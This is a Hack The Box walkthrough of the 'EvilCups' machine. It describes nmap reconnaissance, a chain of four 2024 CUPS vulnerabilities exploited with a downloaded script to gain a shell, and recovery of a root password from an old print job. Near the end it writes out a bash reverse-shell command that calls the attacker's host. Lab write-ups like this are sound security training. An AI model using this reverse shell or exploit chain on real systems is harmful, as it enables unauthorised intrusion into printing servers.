Introduction to EvilCups:
This write-up will explore the “EvilCups” machine from Hack The Box, categorized as a Medium-difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Evilcups” machine from Hack The Box by achieving the following objectives:
User Flag:
The recent CUPS exploits gained significant attention in September 2024. I will leverage the four latest CVEs to achieve remote code execution on a Linux system via cupsd.
Root Flag:
I will locate an old print job and regenerate the PDF to check if it contains the root password.
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oN nmap_initial.txt 10.10.11.40
Nmap Output:
┌─[darknite@parrot]─[~/Documents/htb/EvilCups]
└──╼ $cat initial.nmap
# Nmap 7.94SVN scan initiated Wed Oct 2 18:09:05 2024 as: nmap -sC -sV -oA initial 10.10.11.40
Nmap scan report for 10.10.11.40
Host is up (0.037s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 36:49:95:03:8d:b4:4c:6e:a9:25:92:af:3c:9e:06:66 (ECDSA)
|_ 256 9f:a4:a9:39:11:20:e0:96:ee:c4:9a:69:28:95:0c:60 (ED25519)
631/tcp open ipp CUPS 2.4
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Home - CUPS 2.4.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 2 18:10:19 2024 -- 1 IP address (1 host up) scanned in 74.14 seconds
┌─[darknite@parrot]─[~/Documents/htb/EvilCups]
└──╼ $
Analysis:
- Port 22 (SSH): OpenSSH 9.2p1 on Debian allows secure remote access with ECDSA and ED25519 host keys.
- Port 631 (IPP – CUPS): CUPS 2.4.2 provides printing services with HTTP access and a restricted robots.txt entry.
Web Enumeration:
Exploitation
Web Application Exploration:
The system runs CUPS version 2.4.2, with one printer listed under the “Printers” tab.
The “Printers” tab indicates that a single printer has been installed.
CUPS Vulnerability on EvilCups
Shortly before the release of EvilCups, a security researcher known as Evilsocket published research on vulnerabilities affecting CUPS. The findings revealed four CVEs:
- CVE-2024-47176: This vulnerability involves improper input validation and unrestricted IP address binding in the
cups-browseddaemon, which listens onINADDR_ANY:631. This configuration allows the service to accept packets from any source, enabling an attacker to send aGet-Printer-AttributesIPP request to a malicious URL. CVSS 3.x Severity Rating: 8.3 (High) - CVE-2024-47076: In the
cfGetPrinterAttributes5function of thelibcupsfilterscomponent, a lack of input validation permits the acceptance of unvalidated IPP attributes returned by the server. This oversight can result in creating a malicious PPD file, allowing attacker-controlled data to be processed within the CUPS system. CVSS 3.x Severity Rating: 8.6 (High) - CVE-2024-47175: The
ppdCreatePPDFromIPP2function in thelibppdlibrary is affected by a vulnerability that fails to properly sanitize IPP attributes before writing them to a temporary PPD file. This allows an attacker to inject malicious data into the PPD. When exploited alongside functions such ascfGetPrinterAttributes5andFoomatic, it may lead to remote code execution (RCE) as part of an exploit chain. CVSS 3.x Severity Rating: 8.6 (High) - CVE-2024-47177: This vulnerability involves command injection in the
FoomaticRIPCommandLineparameter of thecups-filterslibrary. Attackers can exploit this flaw to execute arbitrary commands, particularly when combined with other logical vulnerabilities, which may result in RCE via malicious values in PPD files. CVSS 3.x Severity Rating: 9.0 (Critical)
An attacker can remotely add a malicious printer to a system by exploiting these vulnerabilities. When a print job is executed, the vulnerabilities are triggered, allowing arbitrary commands to run.
We can download the script from here which the author is IppSec.
Script Execution on the Target Machine
Let’s go ahead and launch our Python server.
We encountered an error and need to install ippserver it on the machine for the script to function properly.
Finally, we were able to get the script working.
Thirty seconds after running the script, we successfully created a new printer with a queue for our malicious printer.
On the printer’s page, one of the “Maintenance” options is “Print Test Page,” which I’ll go ahead and select.
The moment I select it, I get a shell.
I’ll proceed to upgrade my shell as demonstrated earlier.
We can view the user flag by entering the command cat user.txt.
Escalate to Root Privileges Access
Privilege Escalation:
The same user is assigned a shell in the /etc/passwd file
I previously mentioned that there were three print jobs. According to the CUPS documentation, “Job Files” are located in /var/spool/cups. However, the lp command cannot access this directory.
The cups-dbus-notifier-lockfile is currently empty.
The shell crashes every 5 to 10 minutes due to the printer not being a legitimate device, causing it to be cleaned up.
There’s a delay where it shows a 30-second countdown before responding. After 29 seconds, the target connects and sends the printer payload.
A more effective shell command to send would be:
nohup bash -c "bash -i >& /dev/tcp/10.10.14.147/9007 0>&1"This command runs the shell as a new background process, ensuring it continues to operate even if the session is interrupted.
However, the documentation states that the filename format is D[5 digit integer]-100. I can check if the file associated with a job is present.
Let’s download the file to our machine for additional analysis.
We can open the file as demonstrated in the screenshot above.
The password is stored within the file itself.
We can access the root flag by entering the command cat root.txt.